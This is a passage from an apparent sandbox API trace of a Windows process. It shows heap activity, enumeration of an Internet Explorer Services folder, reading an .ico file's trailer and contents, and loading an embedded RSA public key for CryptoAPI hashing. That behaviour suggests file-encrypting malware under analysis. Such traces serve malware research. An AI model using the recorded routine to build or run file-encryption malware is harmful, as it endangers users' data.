(in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.780] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.781] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.781] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.782] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0203.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0203.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0203.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0203.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0203.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0203.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0203.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.793] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\") returned="Services\\" [0203.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0203.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0203.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.794] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0203.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0203.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0203.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0203.794] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0203.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaa80 [0203.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0203.795] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0203.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea20f8 [0203.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0203.795] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0203.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea20f8 | out: hHeap=0x620000) returned 1 [0203.795] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0203.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0203.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.796] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0203.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0203.796] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0203.796] PathFindFileNameW (pszPath="") returned="" [0203.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.796] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\internet explorer\\services\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0203.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.798] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x50fdc710, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0203.798] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7525ca20, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x10be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico", cAlternateFileName="SEARCH~1.ICO")) returned 1 [0203.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c63720 [0203.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0203.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0203.798] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico") returned=".ico" [0203.798] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0203.799] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=4286) returned 1 [0203.800] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0203.802] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x1098, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0203.802] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0203.858] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0203.859] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0203.859] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0203.859] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x10be, lpOverlapped=0x0) returned 1 [0203.907] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0203.907] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.907] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0203.907] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0204.241] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0204.241] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0204.241] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, 